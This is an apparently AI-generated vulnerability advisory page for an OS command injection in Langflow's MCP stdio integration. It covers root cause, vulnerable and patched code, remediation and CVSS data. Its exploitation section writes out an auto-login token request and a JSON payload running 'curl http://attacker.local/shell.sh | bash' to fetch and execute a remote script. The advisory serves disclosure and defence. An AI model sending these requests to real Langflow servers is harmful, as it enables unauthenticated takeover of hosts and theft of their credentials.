CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-105697

CVE-2026-105697: OS Command Injection in Langflow Model Context Protocol Integration

Alon Barad
Alon Barad
Software Engineer

Oct 8, 2026·5 min read·7 visits

Executive Summary (TL;DR)

Langflow versions prior to 1.10.3 allowed unauthenticated remote attackers to execute arbitrary shell commands on the hosting system by exploiting a model context protocol (MCP) server integration wrapper that parsed commands inside a shell context.

A critical OS command injection vulnerability exists in Langflow's Model Context Protocol (MCP) server integration using stdio transport, allowing unauthenticated remote command execution under default configurations.

Vulnerability Overview

Langflow is a low-code orchestration framework for building artificial intelligence applications. To facilitate communication with external applications, Langflow implements the Model Context Protocol (MCP), supporting integration via a standard input/output (stdio) transport channel.

In versions prior to 1.10.3, the stdio transport mechanism did not safely handle host command execution when initializing external servers. The core vulnerability stems from the application directly spawning subprocesses with user-controlled parameters within a shell evaluation context.

The attack surface is expanded by Langflow's default setup, where the configuration variable LANGFLOW_AUTO_LOGIN is set to true. This configuration enables remote, unauthenticated network users to obtain administrative tokens and trigger arbitrary OS command execution by registering or importing malicious workflow configurations.

Root Cause Analysis

The root cause of CVE-2026-105697 is the improper neutralization of special elements used in operating system commands (CWE-78) within the MCP integration component.

Initially, the backend processed the execution parameters through MCPStdioClient._connect_to_server in src/lfx/src/lfx/base/mcp/util.py using a system shell context. The command string was constructed using unsanitized user-supplied parameters, enabling shell interpreters (such as /bin/sh or cmd.exe) to evaluate command separators, redirection symbols, and subshell executions.

Furthermore, validation logic was decoupled from the execution sink. While some Pydantic validation occurred at the REST API controller boundary via the MCPServerConfig model, this validation was not applied to configurations embedded directly within workflow files, parameters, or tweaks. Consequently, an attacker could bypass front-end validation gates entirely by importing a crafted JSON workflow, forcing the backend runtime to invoke the execution sink with malicious command parameters.

Code Analysis and Architectural Diff

The transition from the vulnerable execution model to the secure implementation involved restricting process spawning to shell-less execution and implementing a centralized validation gate directly before the execution sink.

Below is a representation of the structural modifications applied to the vulnerable process creation flow:

# Vulnerable Implementation
# File: src/lfx/src/lfx/base/mcp/util.py
def _connect_to_server(self, command_str: str):
    # The command string was executed directly via a shell wrapper
    # Shell evaluation allowed metacharacters to trigger command execution
    self.process = subprocess.Popen(
        command_str,
        shell=True,  # Critical Flaw: shell=True evaluated command separators
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True
    )
 
# Patched Implementation
# File: src/lfx/src/lfx/base/mcp/security.py
def validate_mcp_stdio_config(command: str, args: list, env: dict):
    # 1. Enforce that the command is a single executable binary
    if " " in command.strip():
        raise MCPStdioSecurityError("Command must be a single executable binary")
    
    # 2. Match against a strict allowed executable list
    if command not in ALLOWED_MCP_COMMANDS:
        raise MCPStdioSecurityError(f"Command '{command}' is not in the approved allowlist")
        
    # 3. Check arguments for command injection metacharacters
    for arg in args:
        if any(char in arg for char in DANGEROUS_SHELL_CHARS):
            raise MCPStdioSecurityError("Dangerous characters detected in arguments")
            
    # 4. Reject dangerous environment variables to prevent library hijacking
    for key in env.keys():
        if key.lower() in DANGEROUS_ENV_VARS:
            raise MCPStdioSecurityError(f"Dangerous environment variable detected: {key}")

The update resolved the vulnerability by setting shell=False on the process spawning engine and executing validate_mcp_stdio_config immediately before execution. This design guarantees that even if a workflow circumvents initial API parsers, the runtime wrapper blocks the subprocess from executing if it violates security controls.

Exploitation Methodology

Exploitation of CVE-2026-105697 requires network access to the Langflow HTTP API port. The default environment is susceptible to unauthenticated attacks because automatic login generates functional administrative tokens without requiring valid credentials.

An attacker first interacts with the authentication endpoint to acquire a session token:

GET /api/v1/auto_login HTTP/1.1
Host: target-langflow.local:7860

The backend returns an authorization token. Using this token, the attacker registers a new MCP server configuration containing the target payload within the stdio execution properties:

POST /api/v2/mcp/servers/malicious_server HTTP/1.1
Host: target-langflow.local:7860
Authorization: Bearer <session_token>
Content-Type: application/json
 
{
  "command": "bash",
  "args": ["-c", "curl http://attacker.local/shell.sh | bash"],
  "env": {}
}

When this configuration is submitted, the backend attempts to establish a connection with the server to fetch metadata. During this initialization, the MCPStdioClient invokes the OS command runner. The command executes under the privileges of the Langflow server daemon process, granting the attacker interactive control over the host.

Impact Assessment

The impact of successful exploitation is critical, as represented by the CVSS score of 9.9 and vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.

The scope metric is evaluated as Changed (S:C) because executing commands within the operating system shell breaks the execution boundaries of the Langflow application sandbox. An attacker gains full capabilities to read, write, or modify system files, access runtime credentials, and utilize the host for lateral movement within local networks.

While the current Exploit Prediction Scoring System (EPSS) rating remains low, the severity of the flaw dictates immediate patching. The vulnerability exposes application workflows, proprietary datasets, LLM API keys, and underlying infrastructure to unauthorized actors.

Remediation and Defensive Engineering

Remediation requires upgrading the Langflow deployment and securing its configuration parameters.

Administrators must update packages to the designated secure versions: langflow >= 1.10.3, langflow-base >= 0.10.3, and lfx >= 1.10.3.

If immediate software upgrade is not possible, the attack vector must be mitigated by disabling auto-login features and isolating network interfaces. Set the environment variable LANGFLOW_AUTO_LOGIN=false to block unauthorized users from obtaining valid session tokens. Additionally, bind the server daemon strictly to localhost or isolate the interface behind firewalls and corporate VPN networks.

Official Patches

langflow-aiFix Pull Request 1 (Initial validation & command blocks)
langflow-aiFix Pull Request 2 (Runtime execution-level policy)

Fix Analysis (2)

Technical Appendix

CVSS Score
9.9/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.40%
Top 68% most exploited

Affected Systems

langflowlangflow-baselfx

Affected Versions Detail

Product
Affected Versions
Fixed Version
langflow
langflow-ai
>= 1.1.2, < 1.10.31.10.3
langflow-base
langflow-ai
>= 0.1.2, < 0.10.30.10.3
lfx
langflow-ai
< 1.10.31.10.3
AttributeDetail
CWE IDCWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Attack VectorNetwork (AV:N)
CVSS Severity Score9.9 (Critical)
EPSS Score0.00396
Exploit Statuspoc
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1190Exploit Public-Facing Application
Initial Access
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The application constructs an OS command using externally-supplied inputs but fails to properly sanitize or neutralize special characters before passing the string to a command interpreter.

Known Exploits & Detection

GitHub Security AdvisoryAdvisory context detailing vulnerability mechanics, reproduction scenarios, and patched components.

Vulnerability Timeline

Initial validation PR #12290 merged to restrict command options.
2026-03-27
Comprehensive runtime boundary hardening PR #14036 merged.
2026-07-14
Security Advisory GHSA-w794-rj3p-xv45 published and Langflow v1.10.3 released.
2026-10-05

References & Sources

  • [1]GitHub Security Advisory GHSA-w794-rj3p-xv45
  • [2]NVD Record for CVE-2026-105697
  • [3]Authoritative CVE Project Entry
  • [4]Langflow Release v1.10.3

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-105647
4.0

CVE-2026-105647: Server-Side Request Forgery via Favicon Probing in Ghost CMS

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in Ghost CMS from version 6.54.1 to 6.65.0. The vulnerability stems from a validation bypass in the favicon resolution logic within the bookmark-fetching subsystem, which allows remote, unauthenticated attackers to trigger arbitrary HTTP requests to the local host and internal networks. This bypass circumvents the custom DNS-level IP blocklist controls configured globally in the application.

Alon Barad
Alon Barad
1 views•8 min read
•about 2 hours ago•CVE-2026-106450
5.3

CVE-2026-106450: Denial of Service via Eager Resource Allocation in lz4-java LZ4FrameInputStream

A resource allocation vulnerability (CWE-770) in lz4-java before version 1.11.4 allows an unauthenticated remote attacker to trigger CPU exhaustion and high garbage collection overhead by streaming empty concatenated LZ4 frames.

Alon Barad
Alon Barad
4 views•8 min read
•about 3 hours ago•CVE-2026-106449
3.7

CVE-2026-106449: Stack Overflow via Uncontrolled Recursion in yawkat lz4-java

A Denial of Service (DoS) vulnerability exists in the yawkat fork of lz4-java prior to version 1.11.4. Under specific non-default configurations (stopOnEmptyBlock = false), parsing crafted streams with a large sequence of contiguous empty LZ4 blocks triggers uncontrolled recursion inside the LZ4BlockInputStream.refill() method, causing stack exhaustion and thread termination.

Alon Barad
Alon Barad
3 views•6 min read
•about 3 hours ago•CVE-2026-76485
9.8

CVE-2026-76485: Remote Code Execution in Cisco NX-OS VXLAN OAM (NGOAM)

CVE-2026-76485 is a critical stack-based buffer overflow vulnerability in the VXLAN OAM (NGOAM) parsing component of Cisco NX-OS Software. The flaw enables an unauthenticated, remote attacker to execute arbitrary code with root privileges or trigger a denial of service on affected Nexus switches. This vulnerability is triggered through crafted packets sent to an IP interface. No workarounds are currently available to mitigate the vulnerability while preserving the NGOAM functionality. Cisco has published software patches to address this flaw.

Alon Barad
Alon Barad
6 views•6 min read
•about 4 hours ago•CVE-2026-106451
7.3

CVE-2026-106451: Local Privilege Escalation via JNI Extraction TOCTOU in lz4-java

A local privilege escalation and code execution vulnerability exists in the yawkat fork of lz4-java when extracting its bundled JNI shared library into the system temporary directory. Predictable path derivation and lack of exclusive file creation flags allow a local attacker to hijack library loading via a race condition.

Alon Barad
Alon Barad
6 views•6 min read
•about 5 hours ago•CVE-2026-105698
5.4

CVE-2026-105698: Missing Authorization in Deprecated Chat Vertices Endpoints in Langflow

A missing authorization vulnerability in Langflow versions 1.0.0 through 1.10.0 allows authenticated users (and unauthenticated users in versions prior to 1.7.2) to access private workflow structures and execute graph components by targeting deprecated API endpoints.

Amit Schendel
Amit Schendel
5 views•8 min read